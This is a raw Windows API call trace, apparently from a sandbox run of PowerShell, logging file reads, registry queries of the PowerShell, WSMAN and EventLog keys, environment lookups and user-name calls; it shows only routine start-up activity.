	[0532.878] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a7240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x38a7240*, lpNumberOfBytesRead=0x1ecd98*=0xe98, lpOverlapped=0x0) returned 1
	[0532.879] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a6840, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x38a6840*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0532.879] ReadFile (in: hFile=0x2dc, lpBuffer=0x38a7240, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x38a7240*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0532.879] CloseHandle (hObject=0x2dc) returned 1
	[0532.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0532.879] SetErrorMode (uMode=0x1) returned 0x1
	[0532.879] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0532.879] SetErrorMode (uMode=0x1) returned 0x1
	[0532.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0532.880] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x2dc) returned 0x0
	[0532.880] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0532.880] CoTaskMemAlloc (cb=0x5a) returned 0x3eaa40
	[0532.880] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x3eaa40, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0532.880] CoTaskMemFree (pv=0x3eaa40) 
	[0532.881] RegCloseKey (hKey=0x2dc) returned 0x0
	[0532.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0532.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0532.883] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xaf8f1f7a, Data2=0xfbca, Data3=0x49fc, Data4=([0]=0x8c, [1]=0xf7, [2]=0xf3, [3]=0xe7, [4]=0xc0, [5]=0xd6, [6]=0x8, [7]=0x5d))) returned 0x0
	[0532.883] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x9e1acbb5, Data2=0x4d28, Data3=0x4598, Data4=([0]=0xa0, [1]=0x12, [2]=0x94, [3]=0xd0, [4]=0xd2, [5]=0x6b, [6]=0x8, [7]=0x68))) returned 0x0
	[0533.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ecdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0533.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ecdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0533.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ecdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0534.515] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0534.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.515] CoTaskMemFree (pv=0x1b6e48b0) 
	[0534.517] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0534.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.517] CoTaskMemFree (pv=0x1b6e48b0) 
	[0534.518] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0534.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.518] CoTaskMemFree (pv=0x1b6e48b0) 
	[0534.520] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0534.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.520] CoTaskMemFree (pv=0x1b6e48b0) 
	[0534.531] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0534.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.531] CoTaskMemFree (pv=0x1b6e48b0) 
	[0534.532] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0534.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.532] CoTaskMemFree (pv=0x1b6e48b0) 
	[0534.532] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0534.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0534.532] CoTaskMemFree (pv=0x1b6e48b0) 
	[0534.538] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed038 | out: phkResult=0x1ed038*=0x2dc) returned 0x0
	[0534.541] RegQueryInfoKeyW (in: hKey=0x2dc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ecf3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecf38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ecf3c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecf38*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.541] CoTaskMemFree (pv=0x0) 
	[0534.542] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0534.542] RegEnumValueW (in: hKey=0x2dc, dwIndex=0x0, lpValueName=0x3838e0, lpcchValueName=0x1ecfe8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ecfe8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0534.542] CoTaskMemFree (pv=0x3838e0) 
	[0534.542] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0534.542] RegEnumValueW (in: hKey=0x2dc, dwIndex=0x1, lpValueName=0x3838e0, lpcchValueName=0x1ecfe8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ecfe8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0534.542] CoTaskMemFree (pv=0x3838e0) 
	[0534.542] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0534.542] RegEnumValueW (in: hKey=0x2dc, dwIndex=0x2, lpValueName=0x3838e0, lpcchValueName=0x1ecfe8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ecfe8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0534.543] CoTaskMemFree (pv=0x3838e0) 
	[0534.543] RegQueryValueExW (in: hKey=0x2dc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ecfcc, lpData=0x0, lpcbData=0x1ecfc8*=0x0 | out: lpType=0x1ecfcc*=0x1, lpData=0x0, lpcbData=0x1ecfc8*=0x8) returned 0x0
	[0534.543] CoTaskMemAlloc (cb=0xc) returned 0x3ed500
	[0534.543] RegQueryValueExW (in: hKey=0x2dc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ecf9c, lpData=0x3ed500, lpcbData=0x1ecf98*=0x8 | out: lpType=0x1ecf9c*=0x1, lpData="2.0", lpcbData=0x1ecf98*=0x8) returned 0x0
	[0534.543] CoTaskMemFree (pv=0x3ed500) 
	[0536.399] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf88 | out: phkResult=0x1ecf88*=0x2dc) returned 0x0
	[0536.399] RegQueryInfoKeyW (in: hKey=0x2dc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ece8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ece8c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ece88*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.399] CoTaskMemFree (pv=0x0) 
	[0536.399] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.399] RegEnumValueW (in: hKey=0x2dc, dwIndex=0x0, lpValueName=0x3838e0, lpcchValueName=0x1ecf38, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ecf38, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0536.399] CoTaskMemFree (pv=0x3838e0) 
	[0536.399] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.399] RegEnumValueW (in: hKey=0x2dc, dwIndex=0x1, lpValueName=0x3838e0, lpcchValueName=0x1ecf38, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ecf38, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0536.399] CoTaskMemFree (pv=0x3838e0) 
	[0536.400] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.400] RegEnumValueW (in: hKey=0x2dc, dwIndex=0x2, lpValueName=0x3838e0, lpcchValueName=0x1ecf38, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ecf38, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0536.400] CoTaskMemFree (pv=0x3838e0) 
	[0536.400] RegQueryValueExW (in: hKey=0x2dc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ecf1c, lpData=0x0, lpcbData=0x1ecf18*=0x0 | out: lpType=0x1ecf1c*=0x1, lpData=0x0, lpcbData=0x1ecf18*=0x8) returned 0x0
	[0536.400] CoTaskMemAlloc (cb=0xc) returned 0x3ed560
	[0536.400] RegQueryValueExW (in: hKey=0x2dc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1eceec, lpData=0x3ed560, lpcbData=0x1ecee8*=0x8 | out: lpType=0x1eceec*=0x1, lpData="2.0", lpcbData=0x1ecee8*=0x8) returned 0x0
	[0536.400] CoTaskMemFree (pv=0x3ed560) 
	[0536.401] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0536.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0536.401] CoTaskMemFree (pv=0x1b6e48b0) 
	[0536.407] CoTaskMemAlloc (cb=0x104) returned 0x1b6e48b0
	[0536.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e48b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0536.407] CoTaskMemFree (pv=0x1b6e48b0) 
	[0536.413] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecfb8 | out: phkResult=0x1ecfb8*=0x300) returned 0x0
	[0536.416] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ecf2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecf28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ecf2c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ecf28*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.416] CoTaskMemFree (pv=0x0) 
	[0536.417] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.417] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x3838e0, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.417] CoTaskMemFree (pv=0x3838e0) 
	[0536.417] CoTaskMemFree (pv=0x0) 
	[0536.418] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.418] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x3838e0, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.418] CoTaskMemFree (pv=0x3838e0) 
	[0536.418] CoTaskMemFree (pv=0x0) 
	[0536.418] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.418] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x3838e0, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.418] CoTaskMemFree (pv=0x3838e0) 
	[0536.418] CoTaskMemFree (pv=0x0) 
	[0536.418] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.418] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x3838e0, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.418] CoTaskMemFree (pv=0x3838e0) 
	[0536.418] CoTaskMemFree (pv=0x0) 
	[0536.418] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.418] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x3838e0, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.418] CoTaskMemFree (pv=0x3838e0) 
	[0536.418] CoTaskMemFree (pv=0x0) 
	[0536.418] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.418] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x3838e0, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.418] CoTaskMemFree (pv=0x3838e0) 
	[0536.418] CoTaskMemFree (pv=0x0) 
	[0536.418] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.418] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x3838e0, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.418] CoTaskMemFree (pv=0x3838e0) 
	[0536.419] CoTaskMemFree (pv=0x0) 
	[0536.419] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.419] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x3838e0, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.419] CoTaskMemFree (pv=0x3838e0) 
	[0536.419] CoTaskMemFree (pv=0x0) 
	[0536.419] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0536.419] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x3838e0, lpcchName=0x1ecfb8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ecfb8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.419] CoTaskMemFree (pv=0x3838e0) 
	[0536.419] CoTaskMemFree (pv=0x0) 
	[0536.419] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x304) returned 0x0
	[0536.419] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0536.419] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x1c8) returned 0x0
	[0536.419] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0536.419] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x328) returned 0x0
	[0536.419] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0536.419] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x32c) returned 0x0
	[0536.420] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0536.420] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x330) returned 0x0
	[0536.420] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0536.420] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x334) returned 0x0
	[0536.420] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0536.420] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x338) returned 0x0
	[0536.420] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0536.420] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x33c) returned 0x0
	[0536.420] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x0) returned 0x2
	[0536.420] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x340) returned 0x0
	[0536.420] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed018 | out: phkResult=0x1ed018*=0x344) returned 0x0
	[0536.421] RegCloseKey (hKey=0x344) returned 0x0
	[0536.421] RegCloseKey (hKey=0x300) returned 0x0
	[0536.422] RegCloseKey (hKey=0x340) returned 0x0
	[0537.375] CoTaskMemAlloc (cb=0x804) returned 0x1b708ae0
	[0537.376] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b708ae0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0537.377] CoTaskMemFree (pv=0x1b708ae0) 
	[0537.378] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0537.378] GetUserNameW (in: lpBuffer=0x3838e0, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0537.378] CoTaskMemFree (pv=0x3838e0) 
	[0538.455] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ecf68 | out: phkResult=0x1ecf68*=0x348) returned 0x0
	[0538.455] RegQueryInfoKeyW (in: hKey=0x348, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ecedc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1eced8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ecedc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1eced8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.455] CoTaskMemFree (pv=0x0) 
	[0538.455] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.455] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x0, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.456] CoTaskMemFree (pv=0x3838e0) 
	[0538.456] CoTaskMemFree (pv=0x0) 
	[0538.456] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.456] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x1, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.456] CoTaskMemFree (pv=0x3838e0) 
	[0538.456] CoTaskMemFree (pv=0x0) 
	[0538.456] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.456] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x2, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.456] CoTaskMemFree (pv=0x3838e0) 
	[0538.456] CoTaskMemFree (pv=0x0) 
	[0538.456] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.456] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x3, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.456] CoTaskMemFree (pv=0x3838e0) 
	[0538.456] CoTaskMemFree (pv=0x0) 
	[0538.456] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0538.456] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x4, lpName=0x3838e0, lpcchName=0x1ecf68, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ecf68, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0538.456] CoTaskMemFree (pv=0x3838e0) 
	[0538.456] CoTaskMemFree (pv=0x0) 
	[0538.456] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
